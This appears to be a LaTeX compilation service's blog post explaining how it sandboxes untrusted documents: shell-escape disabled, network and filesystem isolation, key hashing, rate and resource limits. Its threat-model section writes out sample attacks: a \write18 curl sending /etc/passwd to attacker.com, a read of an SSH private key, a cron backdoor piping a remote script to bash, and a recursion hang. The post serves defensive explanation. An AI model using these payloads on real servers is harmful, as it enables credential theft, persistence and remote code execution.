FormaTeX

\begin{article}

The FormaTeX Security Model: How We Sandbox LaTeX Compilation

LaTeX can execute shell commands, read files, and make network requests. Here is every security layer FormaTeX implements to safely compile untrusted LaTeX at scale.

LaTeX is a Turing-complete language with built-in access to the file system, shell execution, and external processes. Running user-supplied LaTeX on a shared server without a comprehensive security model is a critical vulnerability. This post describes every layer of the FormaTeX security architecture — so you can understand what we protect you from and make an informed decision when choosing a compilation service.

The LaTeX Threat Model

Before describing defenses, it helps to understand what an attacker can do with unrestricted LaTeX access:

Shell execution via \write18:

latex
% Exfiltrates /etc/passwd to an attacker-controlled server
\write18{curl -s https://attacker.com/collect?data=$(cat /etc/passwd | base64)}

File read via \input and \verbatiminput:

latex
% Reads private key and includes it in the PDF output
\verbatiminput{/home/runner/.ssh/id_rsa}

File write:

latex
% Creates a cron job for persistent access
\newwrite\f
\openout\f=/etc/cron.d/backdoor
\write\f{* * * * * root curl attacker.com/shell.sh | bash}
\closeout\f

Resource exhaustion:

latex
% Infinite recursion — hangs the process indefinitely
\def\recurse{\recurse}
\recurse

Each of these is a real attack. The FormaTeX security model addresses all of them.

Shell-Escape Blocking

The most critical protection. All engines are invoked with shell-escape explicitly disabled:

bash
# pdflatex invocation in production
pdflatex \
  -no-shell-escape \
  -interaction=nonstopmode \
  -halt-on-error \
  document.tex

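With -no-shell-escape, \write18 never spawns a process, regardless of what the LaTeX source contains. The flag also turns off the restricted shell-escape mode (a short allowlist of helper programs) that TeX Live enables by default.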

xelatex and lualatex accept the same -no-shell-escape flag and are invoked with it. For latexmk, the underlying engine is invoked with shell-escape disabled, and the latexmk process itself cannot be used to enable it.
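
As a rough illustration of how a service might keep these flags out of the user's reach, the sketch below builds the argument list from a fixed template and only accepts known engine names. The function name engineArgs and the directEngines map are hypothetical, and latexmk is left out because the article does not say how its engine is configured.

```go
package main

import "fmt"

// directEngines lists the engines this sketch invokes directly.
// Hypothetical: the real service may organize this differently.
var directEngines = map[string]bool{
	"pdflatex": true,
	"xelatex":  true,
	"lualatex": true,
}

// engineArgs returns the fixed argument list for one compilation.
// Nothing from the request influences the flags; only the file name varies.
func engineArgs(engine, texFile string) ([]string, error) {
	if !directEngines[engine] {
		return nil, fmt.Errorf("engine %q is not handled by this sketch", engine)
	}
	return []string{
		"-no-shell-escape",
		"-interaction=nonstopmode",
		"-halt-on-error",
		texFile,
	}, nil
}
```

Passing the result to exec.Command as separate arguments, rather than through a shell string, means the engine name and file name are never interpreted by a shell.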

Some LaTeX tutorials recommend --shell-escape for TikZ externalization or minted syntax highlighting. FormaTeX does not support shell-escape. If your document requires it, you will need to externalize diagrams before sending, or use an alternative highlighting package.

Input Sanitization

Before compilation begins, the input is validated:

  • Content-type check — only JSON with content (string) and engine (enum) fields is accepted
  • Size limits — plan-based input size limits (1 MB free, 10 MB Pro, 25 MB Max, 50 MB Enterprise) prevent memory exhaustion
  • Engine validation — only the four supported engine names are accepted; no other binary names can be injected

The content itself is not filtered — LaTeX is not sanitized line-by-line, because LaTeX macros are too expressive for safe filtering. Instead, the compilation environment is isolated so that any LaTeX source, no matter how malicious, cannot affect the host system.
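
The three validation checks above could look roughly like the following. This is a minimal sketch, not FormaTeX's code: the names compileRequest, allowedEngines, and parseRequest are hypothetical, the engine strings are assumed from the engines named in this post, and rejecting empty content is an added assumption.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// compileRequest mirrors the two fields the post describes.
type compileRequest struct {
	Content string `json:"content"`
	Engine  string `json:"engine"`
}

// allowedEngines is an assumed spelling of the four supported engines.
var allowedEngines = map[string]bool{
	"pdflatex": true, "xelatex": true, "lualatex": true, "latexmk": true,
}

// parseRequest applies the size limit, the JSON shape check, and the engine
// allowlist. It does not inspect the LaTeX source itself.
func parseRequest(body []byte, maxBytes int) (*compileRequest, error) {
	if len(body) > maxBytes {
		return nil, fmt.Errorf("input exceeds plan limit of %d bytes", maxBytes)
	}
	var req compileRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return nil, fmt.Errorf("invalid JSON: %w", err)
	}
	if req.Content == "" {
		return nil, errors.New("content must be a non-empty string")
	}
	if !allowedEngines[req.Engine] {
		return nil, fmt.Errorf("unsupported engine %q", req.Engine)
	}
	return &req, nil
}
```

Because the engine is checked against a fixed set, a value such as "/bin/sh" is rejected before any process is started.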

Network Isolation

Each compilation job runs in a container with no network access:

bash
# Container network policy
--network none

No outbound HTTP requests, no DNS resolution, no access to internal services. Even with shell-escape somehow re-enabled, curl, wget, and netcat cannot reach any external host.

This prevents:

  • Data exfiltration via HTTP callbacks
  • Access to cloud metadata services (AWS instance metadata, GCP metadata)
  • Access to internal database or Redis endpoints

File System Isolation

Every compilation runs in an ephemeral container with a fresh, empty working directory:

  • No persistent storage — each job starts with a clean filesystem
  • No cross-job access — job N cannot read files from job N-1
  • No host filesystem — the container filesystem is separate from the host
  • Read-only root — only the temp compilation directory is writable

\input{/etc/passwd} fails because /etc/passwd does not exist in the isolated container filesystem. The only files available are those explicitly provided in the API request.
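
To make the network and filesystem restrictions concrete, here is a sketch of the arguments one might pass to docker run, assuming Docker is the container runtime (the post shows --network none but does not name the runtime). The function sandboxArgs, the image name, and the paths are hypothetical.

```go
package main

// sandboxArgs builds `docker run` arguments for one compilation job.
// hostJobDir is a fresh per-job directory on the host holding the input
// files; it is the only writable location inside the container.
func sandboxArgs(image, hostJobDir, workDir string) []string {
	return []string{
		"run",
		"--rm",              // remove the container when the job exits
		"--network", "none", // no interfaces besides loopback
		"--read-only", // root filesystem mounted read-only
		"--mount", "type=bind,source=" + hostJobDir + ",target=" + workDir,
		"--workdir", workDir,
		image, // the engine command is appended by the caller
	}
}
```

A caller would append the engine and its flags after the image name and hand the whole slice to exec.Command("docker", ...).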

API Key Hashing

API keys are never stored in plaintext. When you create a key:

  1. FormaTeX generates a cryptographically random key
  2. The raw key is shown to you once — it is never stored
  3. A SHA-256 hash of the key is stored in the database
  4. On each request, the provided key is hashed and compared to the stored hash

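If the FormaTeX database were compromised, the attacker would obtain SHA-256 hashes, not usable API keys. SHA-256 is a one-way function, and because the keys are long random values rather than human-chosen passwords, guessing inputs until one matches a stored hash is computationally infeasible.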

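go
// Simplified key verification (constant-time comparison of hex digests)
import (
    "crypto/sha256"
    "crypto/subtle"
    "encoding/hex"
)

func verifyKey(rawKey string, storedHash string) bool {
    computed := sha256.Sum256([]byte(rawKey))
    return subtle.ConstantTimeCompare([]byte(hex.EncodeToString(computed[:])), []byte(storedHash)) == 1
}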
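
The key-creation steps listed above (generate, show once, store only the hash) might be sketched as follows. The names newAPIKey and hashKey, the 32-byte key length, and the hex encoding are assumptions for illustration; the post does not specify the key format.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
)

// hashKey returns the hex-encoded SHA-256 digest that would be stored.
func hashKey(rawKey string) string {
	sum := sha256.Sum256([]byte(rawKey))
	return hex.EncodeToString(sum[:])
}

// newAPIKey returns a random key to show to the user once, plus the hash
// to persist. The raw key is never written to storage by this function.
func newAPIKey() (rawKey, storedHash string, err error) {
	buf := make([]byte, 32) // 256 bits from the OS CSPRNG
	if _, err = rand.Read(buf); err != nil {
		return "", "", err
	}
	rawKey = hex.EncodeToString(buf)
	return rawKey, hashKey(rawKey), nil
}
```

With 256 bits of randomness per key, a fast unsalted hash is a reasonable choice here; the same design would not be appropriate for user-chosen passwords.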

Rate Limiting

Rate limiting is enforced at two levels:

Per-key rate limiting — each API key has its own request rate tracked in Redis. Exceeding the rate limit returns 429 Too Many Requests.

Plan-based monthly limits — each plan has a monthly compilation limit. The Free plan enforces a hard limit (compilations fail once it is reached). Paid plans use soft limits (overage is tracked but compilations continue).

This prevents:

  • Credential stuffing attacks from exhausting compilation resources
  • A single compromised key from overwhelming the system
  • Denial-of-service via compilation flood
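
Per-key rate limiting can be illustrated with a fixed-window counter. The sketch below keeps counts in process memory instead of Redis, so it is a stand-in for the idea rather than the production design; windowLimiter and its methods are hypothetical names, and the post does not say which limiting algorithm FormaTeX uses.

```go
package main

import "sync"

// windowCount tracks how many requests a key made in one window.
type windowCount struct {
	window int64 // index of the window the count belongs to
	n      int
}

// windowLimiter allows at most limit requests per key in each window of
// windowSec seconds.
type windowLimiter struct {
	mu        sync.Mutex
	limit     int
	windowSec int64
	counts    map[string]windowCount
}

func newWindowLimiter(limit int, windowSec int64) *windowLimiter {
	return &windowLimiter{limit: limit, windowSec: windowSec, counts: make(map[string]windowCount)}
}

// allow reports whether a request for key at Unix time nowSec is within
// the limit. A false result corresponds to 429 Too Many Requests.
func (l *windowLimiter) allow(key string, nowSec int64) bool {
	l.mu.Lock()
	defer l.mu.Unlock()
	w := nowSec / l.windowSec
	c := l.counts[key]
	if c.window != w {
		c = windowCount{window: w} // a new window starts from zero
	}
	if c.n >= l.limit {
		return false
	}
	c.n++
	l.counts[key] = c
	return true
}
```

Passing the current time as an argument keeps the limiter deterministic and easy to test; a Redis-backed version would typically get the same effect with an atomic increment and a key expiry.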

Resource Limits per Job

Each compilation job runs with enforced process-level limits:

Resource         | Limit
CPU time         | Plan-based timeout (30–300 s)
Memory           | Fixed per-job limit
Output file size | Plan-based (1–50 MB)
Temp file count  | Fixed maximum
Disk writes      | Fixed maximum

These limits are enforced at the OS/container level — not just by a LaTeX timeout flag. A LaTeX document that enters an infinite loop is killed by the timeout enforcer, not just paused.
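
One way to enforce a timeout from outside the TeX process is a context deadline on the child process. The sketch below is an assumption about how such an enforcer could look, with runWithTimeout and ErrTimeout as hypothetical names; it covers only the wall-clock limit, not the memory or disk limits in the table.

```go
package main

import (
	"context"
	"errors"
	"os/exec"
	"time"
)

// ErrTimeout is returned when the job exceeds its time budget.
var ErrTimeout = errors.New("compilation timed out")

// runWithTimeout runs the command and kills it if it is still running
// when the timeout expires. Output produced so far is returned either way.
func runWithTimeout(timeout time.Duration, name string, args ...string) ([]byte, error) {
	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()

	// CommandContext kills the process once ctx is done.
	cmd := exec.CommandContext(ctx, name, args...)
	out, err := cmd.CombinedOutput()
	if errors.Is(ctx.Err(), context.DeadlineExceeded) {
		return out, ErrTimeout
	}
	return out, err
}
```

This kills only the direct child process, which is one reason to pair it with container-level limits that apply to every process in the job.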

Zero Data Retention

FormaTeX does not store your LaTeX source or output PDF:

  • Input LaTeX is written to an ephemeral temp directory for the duration of compilation
  • The output PDF is streamed directly in the HTTP response
  • Both are deleted immediately when the job completes, regardless of success or failure
  • Compilation metadata (engine, status, duration, input size) is stored in compilation_logs for usage tracking — the content is never stored

Your document content never persists on FormaTeX infrastructure.

The compilation_logs table stores: timestamp, engine used, status (success/failure), duration in milliseconds, and input size in bytes. It never stores the LaTeX source or any content from your documents.
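
The delete-on-completion behavior described in this section can be sketched with a temp directory that is removed by a deferred call. The names withEphemeralDir and pathExists, and the file name document.tex, are hypothetical; this illustrates the pattern rather than FormaTeX's implementation.

```go
package main

import (
	"os"
	"path/filepath"
)

// withEphemeralDir writes source into a fresh temp directory, runs compile
// on it, and removes the directory whether compile succeeds or fails.
func withEphemeralDir(source []byte, compile func(texPath string) error) error {
	dir, err := os.MkdirTemp("", "job-*")
	if err != nil {
		return err
	}
	defer os.RemoveAll(dir) // runs on success and on failure

	texPath := filepath.Join(dir, "document.tex")
	if err := os.WriteFile(texPath, source, 0o600); err != nil {
		return err
	}
	return compile(texPath)
}

// pathExists is a small helper for checking that cleanup happened.
func pathExists(p string) bool {
	_, err := os.Stat(p)
	return err == nil
}
```

Only metadata such as duration and input size would be recorded by the caller; the directory and everything in it is gone by the time the function returns.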

Summary

Threat                    | Defense
\write18 shell execution  | -no-shell-escape flag on all engines
File system read (\input) | Container isolation: empty filesystem
File system write         | Read-only container root
Network exfiltration      | --network none on all compilation containers
Resource exhaustion       | CPU + memory + timeout limits at OS level
API key theft             | SHA-256 hashing: raw keys never stored
Brute force               | Rate limiting per key + per plan
Data exposure             | Zero retention: content deleted after response

Webhook Security

FormaTeX supports webhooks for async compilation notifications. Webhook delivery includes its own security model:

  • URL validation — webhook URLs are validated on creation to prevent SSRF attacks
  • Delivery signing — each webhook payload is signed so your receiver can verify it originated from FormaTeX
  • Retry logic — failed deliveries are retried with exponential backoff, preventing thundering herd issues
  • HTTPS enforcement — webhook URLs must use HTTPS in production

Webhooks are managed via authenticated CRUD endpoints (POST /webhooks, GET /webhooks, DELETE /webhooks/:id), ensuring only the API key owner can configure delivery targets.
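
For the delivery signing mentioned in the list above, a receiver-side check might look like the sketch below. It assumes an HMAC-SHA256 signature over the raw request body, hex-encoded, with a shared secret; the post does not state the actual scheme, header name, or encoding, so treat every detail here as hypothetical.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
)

// signPayload computes the hex-encoded HMAC-SHA256 of body under secret.
func signPayload(secret, body []byte) string {
	mac := hmac.New(sha256.New, secret)
	mac.Write(body)
	return hex.EncodeToString(mac.Sum(nil))
}

// verifySignature recomputes the MAC and compares it in constant time.
// It returns false for malformed hex as well as for mismatches.
func verifySignature(secret, body []byte, sigHex string) bool {
	got, err := hex.DecodeString(sigHex)
	if err != nil {
		return false
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write(body)
	return hmac.Equal(got, mac.Sum(nil))
}
```

A receiver should verify against the exact bytes it received, before parsing the JSON, since re-serializing the payload can change the bytes and invalidate the signature.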

\end{article}

\related{posts}
